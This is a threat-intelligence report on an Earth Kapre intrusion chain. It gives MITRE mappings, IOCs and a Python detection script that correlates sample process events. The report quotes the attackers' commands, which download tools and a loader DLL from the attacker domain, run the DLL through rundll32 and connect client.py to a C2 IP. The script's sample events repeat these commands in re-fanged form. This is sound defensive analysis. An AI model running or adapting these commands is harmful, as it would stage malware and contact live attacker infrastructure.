Keypoints
- Threat actors used PowerShell (iwr) to download curl.tmp and save it as C:\Windows\System32\curl.exe, then used that curl binary as the staging tool for the remaining downloads.
- A copy of 7-Zip (7za.exe, fetched as 7za.tmp) was dropped into C:\Windows\System32 and used to extract the archive ms.tmp with the password "123".
- The Earth Kapre loader was deployed as ms.dll (occasionally ps.dll) in C:\Windows\System32 and executed via rundll32.exe, which called its ms export.
- Commands were written into temporary batch files via echo, executed, and then deleted to hinder analysis and cover tracks.
- A Python client (client.py, run via pythonw.exe) established outbound communication to the observed C2 198[.]252[.]101[.]86 (passed as --server-ip, with --server-port 41808), and Impacket smbexec activity over SMB (TCP 445) was detected, enabling remote command execution.
MITRE Techniques
- [T1059.001] PowerShell – Invoke-WebRequest (iwr) used to download the first staging tool: (powershell -c "iwr -Uri http://preston[.]melaniebest[.]com/ms/curl.tmp -OutFile C:\Windows\System32\curl.exe -UseBasicParsing").
- [T1059.003] Windows Command Shell – cmd.exe used to echo commands into temporary .bat files, run them and delete them in a single command line: (cmd.exe /Q /c echo curl -o C:\Windows\System32\7za.exe http://preston[.]melaniebest[.]com/ms/7za.tmp … & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\IAqJUm.bat).
- [T1105] Ingress Tool Transfer – Remote files transferred via HTTP and saved to disk under new names (curl.tmp as curl.exe, 7za.tmp as 7za.exe, ms.tmp as ms.dll): (curl -o C:\Windows\System32\ms.dll http://preston[.]melaniebest[.]com/ms/ms.tmp).
- [T1218.011] System Binary Proxy Execution: Rundll32 – rundll32.exe used to load the downloaded loader DLL and call its ms export: (rundll32.exe C:\Windows\system32\ms.dll,ms).
- [T1071] Application Layer Protocol – client.py used for outbound C2 over a custom port (there is no SMB sub-technique under T1071; T1071.004 is DNS, so the parent technique is cited here and the SMB element is covered by T1021.002 below): (… client.py --server-ip 198[.]252[.]101[.]86 --server-port 41808).
- [T1021.002] SMB/Windows Admin Shares – Impacket smbexec behavior observed over TCP 445, providing a semi-interactive shell for remote command execution.
- [T1036] Masquerading – Payloads were hosted with a .tmp extension and renamed on disk to match legitimate utilities (curl.exe, 7za.exe) and a generic system DLL name (ms.dll) inside C:\Windows\System32, so the tooling looks benign at a glance (curl.exe is a command-line download tool; 7za.exe is a copy of 7-Zip).
- [T1070.004] Indicator Removal: File Deletion – The temporary batch files created for execution were deleted immediately afterwards: (del %TEMP%\KzIMnc.bat).
Indicators of Compromise
- [Domain] Payload-hosting domain – preston[.]melaniebest[.]com (served curl.tmp, 7za.tmp and ms.tmp under the /ms/ path).
- [IP Address] Observed C2 – 198[.]252[.]101[.]86 (passed to client.py as --server-ip, with --server-port 41808).
- [File names/paths] Staged and payload files – C:\Windows\System32\curl.exe, C:\Windows\System32\7za.exe, C:\Windows\System32\ms.dll (also ms.tmp, ps.dll, client.py, and randomly named .bat files under C:\Windows\TEMP such as IAqJUm.bat and KzIMnc.bat).
- [Commands] Command-line artifacts – PowerShell iwr download commands, curl -o downloads into System32, and rundll32 execution strings (examples shown in the echoed batch commands above).
The intrusion sequence begins with script-driven downloads: the attackers used PowerShell and echoed cmd commands to fetch a curl binary (curl.tmp, saved as C:\Windows\System32\curl.exe) and a 7-Zip binary (7za.tmp, saved as C:\Windows\System32\7za.exe). Each command was written into a temporary .bat file via echo, executed, and then deleted to reduce forensic visibility. Using the dropped curl, the actor retrieved the archive ms.tmp from the same domain; the report describes it as stored in the system temp location, while the one observed curl command writes the download directly to C:\Windows\System32\ms.dll.
After staging, ms.tmp was extracted with the locally dropped 7za.exe using the hardcoded password "123", producing the loader DLL (ms.dll, sometimes named ps.dll) in C:\Windows\System32. The loader was executed through rundll32.exe (rundll32.exe C:\Windows\System32\ms.dll,ms), which loads the DLL and calls its ms export to run the Earth Kapre payload in memory. The chain relies on legitimate, signed executables and built-in scripting so that each individual step blends with normal administrative activity; the detection opportunity lies in the sequence (download into System32, echo-to-batch-and-delete, password-protected extraction, rundll32 of a freshly written DLL) rather than in any single command.
The deployed Python component (client.py, run via pythonw.exe) established outbound communication to an external server (observed IP 198[.]252[.]101[.]86; the command line passes --server-port 41808, while the report also cites SMB port 445, which fits the Impacket smbexec activity observed alongside it), and network activity showed use of Impacket tools consistent with smbexec to obtain a semi-interactive shell over SMB. Overall, the operation combines HTTP-based ingress, archive extraction, DLL execution via a signed-binary proxy, and SMB-based C2 and lateral-movement techniques, using temporary batch files and deletion to evade detection.
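The following is an added detection example, not code from the original report or from the Earth Kapre tooling. It runs simple rules over a list of constructed process-creation command lines that follow the chain described above, and correlates them: paths written by PowerShell iwr or curl -o are remembered, 7-Zip output directories are remembered, and a later rundll32 that loads a DLL from one of those locations is escalated. The sample events, the 7za invocation (7za x -p123 -o<dir>), the C:\Windows\Temp\client.py path, the two benign control events and the severity labels are assumptions made for the demonstration; only the defanged domain, IP, port, file names and batch-file names come from the page, re-fanged so the regexes see what an endpoint log would actually carry.

```python
import re
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample process-creation events (pid, command line). They follow the
# chain described in the report but are NOT its log data; the 7za invocation and
# the client.py path are assumed. IOCs are written un-defanged, as a log would hold them.
SAMPLE_EVENTS: List[Tuple[int, str]] = [
    (4101, r'powershell -c "iwr -Uri http://preston.melaniebest.com/ms/curl.tmp '
           r'-OutFile C:\Windows\System32\curl.exe -UseBasicParsing"'),
    (4102, r'cmd.exe /Q /c echo curl -o C:\Windows\System32\7za.exe '
           r'http://preston.melaniebest.com/ms/7za.tmp ^> \\127.0.0.1\C$\__output 2^>^&1 '
           r'> %TEMP%\IAqJUm.bat & %COMSPEC% /Q /c %TEMP%\IAqJUm.bat '
           r'& %COMSPEC% /Q /c del %TEMP%\IAqJUm.bat'),
    (4103, r'curl -o C:\Windows\System32\ms.tmp http://preston.melaniebest.com/ms/ms.tmp'),
    (4104, r'C:\Windows\System32\7za.exe x -p123 -oC:\Windows\System32 C:\Windows\System32\ms.tmp'),
    (4105, r'rundll32.exe C:\Windows\System32\ms.dll,ms'),
    (4106, r'pythonw.exe C:\Windows\Temp\client.py --server-ip 198.252.101.86 --server-port 41808'),
    (4107, r'rundll32.exe shell32.dll,Control_RunDLL'),     # benign control (assumed)
    (4108, r'C:\Windows\System32\svchost.exe -k netsvcs'),   # benign control (assumed)
]

KNOWN_C2_IPS = {"198.252.101.86"}  # from the report's IOC list

def download_targets(cmd: str) -> Set[str]:
    """Lower-cased paths that a PowerShell iwr -OutFile or curl -o command writes to disk."""
    targets = set(re.findall(r"-OutFile\s+(\S+)", cmd))
    if re.search(r"\bcurl(?:\.exe)?\b", cmd, re.I):
        targets.update(re.findall(r"(?:^|\s)-o\s+(\S+)", cmd))
    return {t.strip('"').lower() for t in targets}

def echo_to_batch_then_delete(cmd: str) -> Optional[str]:
    """The .bat name when one command line both writes a batch file via echo and deletes it."""
    if not re.search(r"\becho\s", cmd, re.I):
        return None
    written = re.search(r">\s*(\S+\.bat)\b", cmd, re.I)
    deleted = re.search(r"\bdel\s+(\S+\.bat)\b", cmd, re.I)
    if written and deleted and written.group(1).lower() == deleted.group(1).lower():
        return written.group(1)
    return None

def password_extraction(cmd: str) -> Optional[Tuple[str, str]]:
    """(password, output dir) for a 7-Zip extract that passes -p; output dir is '' if absent."""
    m = re.search(r"\b7za?(?:\.exe)?\s+[xe]\s.*?-p(\S*)", cmd, re.I)
    if not m:
        return None
    out = re.search(r"(?:^|\s)-o(\S+)", cmd)
    return m.group(1), (out.group(1).lower() if out else "")

def rundll32_target(cmd: str) -> Optional[Tuple[str, str]]:
    """(lower-cased DLL path, export name) for a rundll32 invocation."""
    m = re.search(r"\brundll32(?:\.exe)?\s+\"?([^\s\",]+\.dll)\"?(?:,(\S+))?", cmd, re.I)
    return (m.group(1).lower(), m.group(2) or "") if m else None

def client_c2(cmd: str) -> Optional[Tuple[str, int]]:
    """(server ip, server port) from a client.py-style --server-ip/--server-port command line."""
    ip = re.search(r"--server-ip\s+(\S+)", cmd)
    port = re.search(r"--server-port\s+(\d+)", cmd)
    return (ip.group(1), int(port.group(1)) if port else 0) if ip else None

def analyze(events: List[Tuple[int, str]]) -> List[Dict[str, object]]:
    """Run the rules in event order and correlate rundll32 with earlier drops/extractions."""
    findings: List[Dict[str, object]] = []
    dropped: Set[str] = set()       # paths written by download commands seen so far
    extract_dirs: Set[str] = set()  # directories 7-Zip extracted into so far
    for pid, cmd in events:
        for path in download_targets(cmd):
            dropped.add(path)
            sev = "high" if "\\windows\\system32\\" in path else "medium"
            findings.append({"pid": pid, "rule": "ingress_tool_transfer", "severity": sev, "detail": path})
        bat = echo_to_batch_then_delete(cmd)
        if bat:
            findings.append({"pid": pid, "rule": "echo_bat_exec_delete", "severity": "high", "detail": bat})
        ext = password_extraction(cmd)
        if ext:
            pw, outdir = ext
            if outdir:
                extract_dirs.add(outdir)
            findings.append({"pid": pid, "rule": "password_protected_extract", "severity": "medium",
                             "detail": f"-p{pw} -> {outdir or '<cwd>'}"})
        rd = rundll32_target(cmd)
        if rd:
            dll, export = rd
            dll_dir = dll.rsplit("\\", 1)[0] if "\\" in dll else ""
            # Only escalate when the DLL came from an observed download or extraction.
            if dll in dropped or (dll_dir and dll_dir in extract_dirs):
                findings.append({"pid": pid, "rule": "rundll32_dropped_dll", "severity": "critical",
                                 "detail": f"{dll},{export}"})
        c2 = client_c2(cmd)
        if c2:
            ip, port = c2
            sev = "critical" if ip in KNOWN_C2_IPS else "medium"
            findings.append({"pid": pid, "rule": "client_py_c2", "severity": sev, "detail": f"{ip}:{port}"})
    return findings

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f)
```

The rundll32 rule deliberately stays silent on its own (shell32.dll,Control_RunDLL in the control event produces nothing) and only fires when the DLL path or its directory was previously touched by a download or a 7-Zip extraction, which is the part of this chain that a signature on rundll32 alone would miss.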